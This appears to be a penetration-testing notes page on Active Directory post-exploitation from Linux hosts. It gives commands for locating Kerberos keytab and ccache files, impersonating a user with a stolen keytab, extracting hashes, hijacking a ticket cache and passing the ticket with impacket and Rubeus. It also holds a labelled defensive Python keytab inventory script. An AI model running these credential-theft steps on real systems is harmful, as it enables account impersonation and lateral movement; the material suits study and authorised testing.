Linux Post-Exploitation

The only difference from Post-Exploitation in #Pentesting is that here we cover only AD-related post-exploitation vectors that are executed on a Linux OS.

Linux hosts can be joined to Active Directory even though it is a Microsoft technology. A Linux machine also does not need to be joined to AD in order to use Kerberos tickets.

Checking Linux and AD relations

realm

realm list

PS

ps -ef | grep -i "winbind\|sssd"

Finding Kerberos Tickets

Finding tickets is a very important part of Active Directory exploitation and post-exploitation. To begin with, tickets on Linux are usually found in these places:

  • keytab files - commonly allow scripts to authenticate automatically using Kerberos, without human interaction and without a password stored in a plain-text file

  • ccache files - the credential cache, usually stored in the /tmp directory

  • KRB5CCNAME - environment variable that points to the credential cache currently in use

Crontab

crontab -l

Keytab Files

find / -name "*keytab*" -ls 2>/dev/null

Ccache

env | grep -i krb5
ls -la /tmp

Abusing Keytab

Impersonate user

klist -k -t # list the principals and timestamps stored in the keytab
kinit carni7@AMOGUS.KEK -k -t /opt/kerbusers/carni7.keytab # impersonate carni7 using his keytab

KeyTabExtract

[LINK] A tool that extracts Kerberos hashes from a keytab file.

python3 /opt/keytabextract.py /opt/specialfiles/carni7.keytab
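Added example, not part of these notes or of KeyTabExtract: a Python inventory of a version 0x0502 keytab that lists principal, enctype, kvno and timestamp for each entry and flags DES/RC4 keys, without ever emitting the key bytes, which is the check a defender would run over keytabs located by the find command above. The sample keytab, the host principal srv01.amogus.kek and the key values are constructed.

```python
import struct
from datetime import datetime, timezone

# Enctype numbers from the IANA Kerberos registry; DES (1, 3) and RC4 (23) entries are flagged weak.
ENCTYPES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
WEAK = {1, 3, 23}

def _counted(buf, off):
    (n,) = struct.unpack_from(">H", buf, off)   # counted_octet_string: uint16 length + bytes
    return buf[off + 2:off + 2 + n], off + 2 + n

def parse_keytab(data):
    """Inventory a 0x0502 keytab (principal, enctype, kvno, timestamp); key bytes are skipped."""
    if data[:2] != b"\x05\x02":
        raise ValueError("not a version 0x0502 keytab")
    off, entries = 2, []
    while off + 4 <= len(data):
        size = struct.unpack_from(">i", data, off)[0]; off += 4
        if size == 0: break
        if size < 0:                    # negative size marks a deleted slot of that length
            off -= size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        realm, off = _counted(data, off + 2)
        comps = []
        for _ in range(ncomp):
            comp, off = _counted(data, off); comps.append(comp.decode())
        _name_type, ts, vno8, enctype, klen = struct.unpack_from(">IIBHH", data, off)
        off += 13 + klen                # jump over the key material itself
        kvno = vno8
        if end - off >= 4:              # optional 32-bit kvno follows the key
            kvno = struct.unpack_from(">I", data, off)[0] or vno8
        entries.append({"principal": "/".join(comps) + "@" + realm.decode(), "kvno": kvno,
                        "enctype": ENCTYPES.get(enctype, "enctype-%d" % enctype), "weak": enctype in WEAK,
                        "timestamp": datetime.fromtimestamp(ts, timezone.utc).isoformat()})
        off = end
    return entries

def build_entry(realm, comps, enctype, key, kvno, ts):
    # Encoder used only to build the constructed sample below
    body = struct.pack(">HH", len(comps), len(realm)) + realm.encode()
    for comp in comps:
        body += struct.pack(">H", len(comp)) + comp.encode()
    body += struct.pack(">IIBHH", 1, ts, kvno & 0xFF, enctype, len(key)) + key + struct.pack(">I", kvno)
    return struct.pack(">i", len(body)) + body

# Constructed sample (not a real keytab): an AES key for a user and an RC4 key for a host principal.
SAMPLE_KEYTAB = (b"\x05\x02" + build_entry("AMOGUS.KEK", ["carni7"], 18, bytes(32), 3, 1700000000)
                 + build_entry("AMOGUS.KEK", ["host", "srv01.amogus.kek"], 23, bytes(16), 3, 1700000000))
```

Run it against a real keytab with parse_keytab(open(path, "rb").read()); any entry reported as weak is a candidate for re-keying to AES.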

Abusing ccache

To use ccache files you need root privileges.

Checking group privileges

id carni7@amogus.kek

After locating the right non-expired Kerberos ticket, we can import the ccache file into our session by changing the value of the KRB5CCNAME environment variable and then checking the tickets with klist.

cp /tmp/krb5cc_768304578_BRB541 .
export KRB5CCNAME=/root/krb5cc_768304578_BRB541
klist
Ticket cache: FILE:/root/krb5cc_768304578_BRB541

If klist shows the same cache path, we can be sure that Kerberos is now using our ticket.

Ticket Converter

impacket-ticketConverter krb5cc_768304578_BRB541 carni7.kirbi

Importing Kerberos Ticket

C:\Rubeus.exe ptt /ticket:c:\carni7.kirbi
